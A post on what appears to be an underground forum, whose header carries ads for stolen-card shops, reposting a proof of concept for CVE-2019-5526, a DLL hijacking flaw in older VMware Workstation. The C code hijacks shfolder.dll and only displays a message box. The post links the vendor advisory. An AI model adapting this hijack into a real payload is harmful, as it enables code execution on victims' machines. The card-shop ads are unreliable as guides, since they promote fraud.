Ad End 1 May 2026
Ad End 4 April 2026
Ad Ends 17June 2026
adv exp at 20 April 2026
banner Expire 25 April 2025
ad End 25 April 2026
banner Expire 10 May 2026
ad End 5 May 2026
What's new
UniCvv
banner Expire 20 October 2024
Money Club cc shop
Wizard's shop 2.0
Ad Ends 13 July 2025
Trump cc shop
BidenCash Shop
Blackstash cc shop
Kfc CLub
Yale Lodge
best shop

Vmware workstation dll hijacking

File_closed07

TRUSTED VERIFIED SELLER
Staff member
Joined
Jun 13, 2020
Messages
8,051
Reaction score
1,023
Points
212
Awards
2
  • trusted user
  • Rich User
VMware Workstation versions prior to 15.1.0 suffer from a dll hijacking vulnerability.

MD5 | e4ae43fff5271c25af6a88e2b9cdeb55
Download

Code:
#---------------------------------------------------------
# Title: VMware Workstation DLL hijacking < 15.1.0
# Date: 2019-05-14
# Author: Miguel Mendez Z. & Claudio Cortes C.
# Team: www.exploiting.cl
# Vendor: https://www.vmware.com
# Version: VMware Workstation Pro / Player (Workstation)
# Tested on: Windows Windows 7_x86/7_x64 [eng]
# Cve: CVE-2019-5526
#---------------------------------------------------------


Description:

VMware Workstation contains a DLL hijacking issue because some DLL.


DLL Hijacking: shfolder.dll
Hooking: SHGetFolderPathW()

------Code_Poc-------
#include "dll.h"
#include <windows.h>

DLLIMPORT void SHGetFolderPathW()
{
MessageBox(0, "s1kr10s", "VMWare-Poc", MB_ICONINFORMATION);
exit(0);
}

--------------------------
https://www.vmware.com/security/advisories/VMSA-2019-0007.html
 
Ad End 1 November 2024
Top